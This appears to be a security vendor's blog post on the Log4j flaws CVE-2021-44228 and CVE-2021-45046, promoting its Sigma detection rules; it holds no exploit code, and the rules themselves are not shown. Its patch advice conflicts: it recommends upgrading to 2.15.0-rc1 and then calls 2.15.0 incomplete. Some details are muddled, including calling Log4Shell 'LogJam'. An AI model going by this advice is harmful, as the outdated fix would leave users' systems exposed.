Yet another splitting headache for SOC teams — beware of the hottest Log4j vulnerability CVE-2021-45046! The cybersecurity world has just been shaken by an increasing amount of exploitation attempts for CVE-2021-44228, a critical zero-day vulnerability affecting the Apache Log4j Java logging library, while another high-severity Log4j RCE flaw tracked as CVE-2021-45046 comes on the scene.
The latest CVE-2021-45046 vulnerability was discovered just a day after the release of the Log4j version 2.16.0 on December 14 receiving the CVSS Score of 3.7. Later, due to the highly assessed risks it poses, it received the Critical security impact rating with a score dramatically increased to 9.0. According to the Apache Software Foundation notice, the newly discovered vulnerability affects all Log4j versions from 2.0-beta9 to 2.15.0 (excluding 2.12.2).
Another notorious zero-day vulnerability that has been first discovered in Log4j, known as Log4Shell or LogJam, is an unauthenticated remote code execution issue enabling full system compromise. The flaw is extremely easy to exploit, and with multiple PoCs spreading online, it becomes a trifling matter for adversaries. As a result, hackers can launch remote code execution attacks to gain full control over the affected server.
CVE-2021-44228 analysis shows that all systems running Log4j 2.0-beta9 through 2.14.1 are vulnerable. Moreover, since the security issue impacts the default configs for most of Apache frameworks, such as Apache Struts2, Apache Solr, Apache Druid, Apache Flink, a wide range of software and web apps used by both enterprises and individual users are exposed to the attacks.
Alibaba Cloud’s security team first spotted and reported the vulnerability to Apache in late November 2021. Notably, it was initially identified on Minecraft-related servers, where adversaries attempted to execute malicious code on clients running the Java version of the extremely popular game. After the cause of the issue was identified in Log4j, exploit code samples promptly started to occur online.
Currently, security experts are reporting Internet-wide scans for vulnerable systems. Also, CERT New Zeland alerted about multiple in-the-wild exploitations.
All users leveraging vulnerable versions of Log4j should upgrade to log4j-2.15.0-rc1 ASAP. Additionally, Organizations are encouraged to monitor any malicious activity associated with CVE-2021-44228 and look for anomalies proving they have been compromised. To enhance timely attack detection, the SOC Prime Team has created a batch of dedicated Sigma rules. Security professionals can download the rules from SOC Prime’s Detection as Code platform:
This detection has translations for the following SIEM, EDR & XDR platforms: Microsoft Sentinel, Elastic Stack, Splunk, Humio, Sumo Logic, ArcSight, QRadar, FireEye, LogPoint, Graylog, Regex Grep, RSA NetWitness, Apache Kafka ksqlDB, Securonix, and Open Distro.
The rule is aligned with the latest MITRE ATT&CK® framework v.10, addressing the Initial Access tactic with Exploit Public-Facing Application as the main technique (T1190).
To help organizations stay constantly alert, the SOC Prime Team has recently released the latest Sigma-based rule to detect potential exploitation attempts of CVE-2021-44228. This rule detects possible Log4j exploitation patterns based on proxy logs and the download of a malicious class file that leads to creating a reverse bash shell:
All users leveraging Java 8 or later should update to the latest Log4j 2.16.0 version, since previous mitigations in Apache Log4j 2.15.0 appeared to be incomplete. To help organizations detect CVE-2021-45046 and minimize the risks of exploit attempts, the SOC Prime Team has recently released a dedicated Sigma-based rule that identifies Log4j exploitation patterns and log entries in any available log files.
Sign up for free at SOC Prime’s Detection as Code platform to detect the latest threats in your security environment, improve your log source and MITRE ATT&CK coverage, and enhance your organization’s ROI for cybersecurity. Security experts can also join our Threat Bounty Program to monetize their own detection content.